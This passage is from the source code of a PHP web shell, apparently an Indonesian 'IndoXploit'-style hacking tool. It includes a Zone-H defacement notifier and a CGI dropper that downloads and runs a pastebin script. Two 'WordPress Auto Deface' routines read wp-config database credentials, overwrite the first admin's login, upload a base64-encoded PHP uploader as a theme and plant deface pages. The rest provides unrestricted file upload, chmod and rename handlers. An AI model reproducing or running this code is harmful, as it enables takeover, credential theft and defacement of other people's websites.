name=\'cek_edit\' value=\'Y\' checked>Y<input type=\'radio\' name=\'cek_edit\' value=\'N\'>N<br>\r\n\t\t<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>\r\n\t\t<textarea name=\'edit_content\' placeholder=\'contoh script: http://pastebin.com/EpP671gK\' style=\'width: 450px; height: 150px;\'></textarea><br>\r\n\t\t<input type=\'submit\' name=\'hajar\' value=\'Submit\' style=\'width: 100px;\'><br>\r\n\t\t</form>\r\n\t\t<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'zoneh\') {\r\n\tif($_POST[\'submit\']) {\r\n\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$nick = $_POST[\'nick\'];\r\n\t\techo "Defacer Onhold: <a href=\'http://www.zone-h.org/archive/notifier=$nick/published=0\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";\r\n\t\techo "Defacer Archive: <a href=\'http://www.zone-h.org/archive/notifier=$nick\' target=\'_blank\'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";\r\n\t\tfunction zoneh($url,$nick) {\r\n\t\t\t$ch = curl_init("http://www.zone-h.com/notify/single");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");\r\n\t\t\treturn curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t}\r\n\t\tforeach($domain as $url) {\r\n\t\t\t$zoneh = zoneh($url,$nick);\r\n\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $zoneh)) {\r\n\t\t\t\techo "$url -> <font color=lime>OK</font><br>";\r\n\t\t\t} else {\r\n\t\t\t\techo "$url -> <font color=red>ERROR</font><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><form method=\'post\'>\r\n\t\t<u>Defacer</u>: <br>\r\n\t\t<input type=\'text\' name=\'nick\' size=\'58\' value=\'./MekiTembem404\'><br>\r\n\t\t<u>Domains</u>: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'url\'></textarea><br>\r\n\t\t<input type=\'submit\' name=\'submit\' value=\'Submit\' style=\'width: 100px;\'>\r\n\t\t</form>";\r\n\t}\r\n\techo "</center>";\r\n} elseif($_GET[\'do\'] == \'cgi\') {\r\n\t$cgi_dir = mkdir(\'idx_cgi\', 0755);\r\n\t$file_cgi = "idx_cgi/cgi.izo";\r\n\t$isi_htcgi = "AddHandler cgi-script .izo";\r\n\t$htcgi = fopen(".htaccess", "w");\r\n\t$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");\r\n\t$cgi = fopen($file_cgi, "w");\r\n\tfwrite($cgi, $cgi_script);\r\n\tfwrite($htcgi, $isi_htcgi);\r\n\tchmod($file_cgi, 0755);\r\n\techo "<iframe src=\'idx_cgi/cgi.izo\' width=\'100%\' height=\'270%\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\r\n} elseif($_GET[\'do\'] == \'fake_root\') {\r\n\tob_start();\r\n\tfunction reverse($url) {\r\n\t\t$ch = curl_init("http://domains.yougetsignal.com/domains.php");\r\n\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");\r\n\t\t\t curl_setopt($ch, CURLOPT_HEADER, 0);\r\n\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t$resp = curl_exec($ch);\r\n\t\t$resp = str_replace("[","", str_replace("]","", str_replace("\\"\\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("\'","", str_replace("\'","", str_replace(":",",", str_replace(\'"\',\'\', $resp ) ) ) ) ) ) ) ) ) ))));\r\n\t\t$array = explode(",,", $resp);\r\n\t\tunset($array[0]);\r\n\t\tforeach($array as $lnk) {\r\n\t\t\t$lnk = "http://$lnk";\r\n\t\t\t$lnk = str_replace(",", "", $lnk);\r\n\t\t\techo $lnk."\\n";\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\t\t curl_close($ch);\r\n\t}\r\n\tfunction cek($url) {\r\n\t\t$ch = curl_init($url);\r\n\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\r\n\t\t$resp = curl_exec($ch);\r\n\t\treturn $resp;\r\n\t}\r\n\t$cwd = getcwd();\r\n\t$ambil_user = explode("/", $cwd);\r\n\t$user = $ambil_user[2];\r\n\tif($_POST[\'reverse\']) {\r\n\t\t$site = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$file = $_POST[\'file\'];\r\n\t\tforeach($site as $url) {\r\n\t\t\t$cek = cek("$url/~$user/$file");\r\n\t\t\tif(preg_match("/hacked/i", $cek)) {\r\n\t\t\t\techo "URL: <a href=\'$url/~$user/$file\' target=\'_blank\'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><form method=\'post\'>\r\n\t\tFilename: <br><input type=\'text\' name=\'file\' value=\'deface.html\' size=\'50\' height=\'10\'><br>\r\n\t\tUser: <br><input type=\'text\' value=\'$user\' size=\'50\' height=\'10\' readonly><br>\r\n\t\tDomain: <br>\r\n\t\t<textarea style=\'width: 450px; height: 250px;\' name=\'url\'>";\r\n\t\treverse($_SERVER[\'HTTP_HOST\']);\r\n\t\techo "</textarea><br>\r\n\t\t<input type=\'submit\' name=\'reverse\' value=\'Scan\' style=\'width: 100px;\'>\r\n\t\t</form><br>\r\n\t\tNB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'adminer\') {\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\tfunction adminer($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t \t curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'adminer.php\')) {\r\n\t\techo "<center><font color=lime><a href=\'$full/adminer.php\' target=\'_blank\'>-> adminer login <-</a></font></center>";\r\n\t} else {\r\n\t\tif(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {\r\n\t\t\techo "<center><font color=lime><a href=\'$full/adminer.php\' target=\'_blank\'>-> adminer login <-</a></font></center>";\r\n\t\t} else {\r\n\t\t\techo "<center><font color=red>gagal buat file adminer</font></center>";\r\n\t\t}\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n \t\t$ch = curl_init($sites);\r\n\t \t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t \t\t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n \t\t$post = array(\r\n "log" => "$userr",\r\n "pwd" => "$pass",\r\n "rememberme" => "forever",\r\n "wp-submit" => "$wp_submit",\r\n "redirect_to" => "$web",\r\n "testcookie" => "1",\r\n );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$scan = $_POST[\'link_config\'];\r\n\t\t$link_config = scandir($scan);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "indoxploit";\r\n\t\t$pass = "indoxploit";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link_config as $dir_config) {\r\n\t\t\tif(!is_file("$scan/$dir_config")) continue;\r\n\t\t\t$config = file_get_contents("$scan/$dir_config");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\t\techo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[+] $target <br>";\r\n\t\t\t\t}\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\t\techo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t\t$www = "m.php";\r\n\t\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t\t);\r\n\t\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t\t curl_close($ch);\r\n\t\t\t\t\t$y = date("Y");\r\n\t\t\t\t\t$m = date("m");\r\n\t\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t \t\t \t\t curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t \t\t curl_setopt($ch6, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t\t curl_close($ch6);\r\n\t\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n \t \techo "[+] <font color=\'lime\'>Berhasil...</font><br>";\r\n \t \techo "[+] <a href=\'$as\' target=\'_blank\'>$as</a><br><br>"; \r\n \t } else {\r\n \t echo "[-] <font color=\'red\'>Gagal...</font><br>";\r\n \t echo "[!!] coba aja manual: <br>";\r\n \t echo "[+] <a href=\'$target/wp-login.php\' target=\'_blank\'>$target/wp-login.php</a><br>";\r\n \t echo "[+] username: <font color=lime>$user</font><br>";\r\n \t echo "[+] password: <font color=lime>$pass</font><br><br>"; \r\n \t }\r\n \t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><h1>WordPress Auto Deface</h1>\r\n\t\t<form method=\'post\'>\r\n\t\t<input type=\'text\' name=\'link_config\' size=\'50\' height=\'10\' value=\'$dir\'><br>\r\n\t\t<input type=\'text\' name=\'script\' height=\'10\' size=\'50\' placeholder=\'Hacked by \' required><br>\r\n\t\t<input type=\'submit\' style=\'width: 100px;\' name=\'auto_deface_wp\' value=\'Submit\'>\r\n\t\t</form>\r\n\t\t<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>\r\n\t\t</center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp2\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n \t\t$ch = curl_init($sites);\r\n\t \t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t \t\t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIESESSION,true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n \t\t$post = array(\r\n "log" => "$userr",\r\n "pwd" => "$pass",\r\n "rememberme" => "forever",\r\n "wp-submit" => "$wp_submit",\r\n "redirect_to" => "$web",\r\n "testcookie" => "1",\r\n );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$link = explode("\\r\\n", $_POST[\'link\']);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "indoxploit";\r\n\t\t$pass = "indoxploit";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link as $dir_config) {\r\n\t\t\t$config = anucurl($dir_config);\r\n\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t$option = $dbprefix."options";\r\n\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t$id = $result[ID];\r\n\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t$target = $result2[option_value];\r\n\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\techo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";\r\n\t\t\t} else {\r\n\t\t\t\techo "[+] $target <br>";\r\n\t\t\t}\r\n\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\techo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t} else {\r\n\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t$www = "m.php";\r\n\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t);\r\n\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t$data3 = curl_exec($ch);\r\n\t\t\t\t\t curl_close($ch);\r\n\t\t\t\t$y = date("Y");\r\n\t\t\t\t$m = date("m");\r\n\t\t\t\t$namafile = "id.php";\r\n\t\t\t\t$fpi = fopen($namafile,"w");\r\n\t\t\t\tfputs($fpi,$script);\r\n\t\t\t\t$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_POSTFIELDS, array(\'file3\'=>"@$namafile"));\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");\r\n\t \t\t \t curl_setopt($ch6, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t \t curl_setopt($ch6, CURLOPT_COOKIESESSION,true);\r\n\t\t\t\t$postResult = curl_exec($ch6);\r\n\t\t\t\t\t curl_close($ch6);\r\n\t\t\t\t$as = "$target/k.php";\r\n\t\t\t\t$bs = anucurl($as);\r\n\t\t\t\tif(preg_match("#$script#is", $bs)) {\r\n \techo "[+] <font color=\'lime\'>Berhasil...</font><br>";\r\n \techo "[+] <a href=\'$as\' target=\'_blank\'>$as</a><br><br>"; \r\n } else {\r\n echo "[-] <font color=\'red\'>Gagal...</font><br>";\r\n echo "[!!] coba aja manual: <br>";\r\n echo "[+] <a href=\'$target/wp-login.php\' target=\'_blank\'>$target/wp-login.php</a><br>";\r\n echo "[+] username: <font color=lime>$user</font><br>";\r\n echo "[+] password: <font color=lime>$pass</font><br><br>"; \r\n }\r\n \tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center><h1>WordPress Auto Deface V.2</h1>\r\n\t\t<form method=\'post\'>\r\n\t\tLink Config: <br>\r\n\t\t<textarea name=\'link\' placeholder=\'http://target.com/idx_config/user-config.txt\' style=\'width: 450px; height:250px;\'></textarea><br>\r\n\t\t<input type=\'text\' name=\'script\' height=\'10\' size=\'50\' placeholder=\'Hacked by \' required><br>\r\n\t\t<input type=\'submit\' style=\'width: 100px;\' name=\'auto_deface_wp\' value=\'Hajar!!\'>\r\n\t\t</form></center>";\r\n\t}\r\n}\r\necho \'</font></center></td></tr><tr><td><center>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="green">File Upload</font><br />\';\r\n}else{\r\necho \'<font color="red">Upload Failed !!</font><br />\';\r\n}\r\n}\r\necho \'</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />\r\n<input type="submit" value="Upload" />\r\n</form></center>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td><center>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</center></tr></td></table><br />\';\r\necho(\' <textarea style="width: 100%;height: 400px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea>\');\r\n}\r\n//Empety\r\nelseif(isset($_GET[\'option\']) && $_GET[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\n//Chmod\r\nif($_GET[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="green">Change Permission Done </font><br />\';\r\n}else{\r\necho \'<font color="red">Change Permission Error </font><br />\';\r\n}\r\n}\r\n\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($patc)), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\n//\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\t echo \'<form action="?option&path=\'.$cwd.\'&opt=delete&type=buat" method="POST">\r\nNew Name : <input name="name" type="text" size="20" value="Folder" />\r\n<input type="hidden" name="path" value="\'.$cwd.\'">\r\n<input type="hidden" name="opt" value="delete">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\n//Rename file\r\nelseif($_GET[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="green">Change Name Done </font><br />\';\r\n}else{\r\necho \'<font color="red">Change Name Error </font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n$new = $_POST[\'newname\'];\r\n\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="20" value="\'.$new.\'" />\r\n<input type="hidden" name="path" value="\'.$patc.\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Submit" 